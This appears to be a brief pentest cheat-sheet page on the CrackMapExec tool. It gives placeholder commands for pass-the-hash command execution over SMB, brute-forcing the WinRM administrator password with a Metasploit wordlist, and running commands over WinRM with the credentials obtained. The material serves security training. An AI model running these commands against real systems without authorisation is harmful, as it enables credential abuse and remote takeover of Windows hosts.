Tier II

Crackmapexec

Crackmapexec is a post-exploitation tool and Swiss Army knife for pentesters, red teamers, and cyber security professionals.

Crackmapexec Icon

Crackmapexec

Crackmapexec is a post-exploitation tool and Swiss Army knife for pentesters, red teamers, and cyber security professionals.


Pass-the-Hash Attack (Windows)


Run the CrackmapExec tool for smb with credentials and hash password you have got and the command you want to execute on the target:
crackmapexec smb target-ip -u target-username -H "target-NTLMhash" -x "command"


WinRM (Windows)


Run crackmapexec on the target in order to gain administrator credentials:
crackmapexec winrm target-ip -u administrator -p /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Execute the command after specifying valid administrator credentials:
crackmapexec winrm target-ip -u administrator -p target-password -x "command"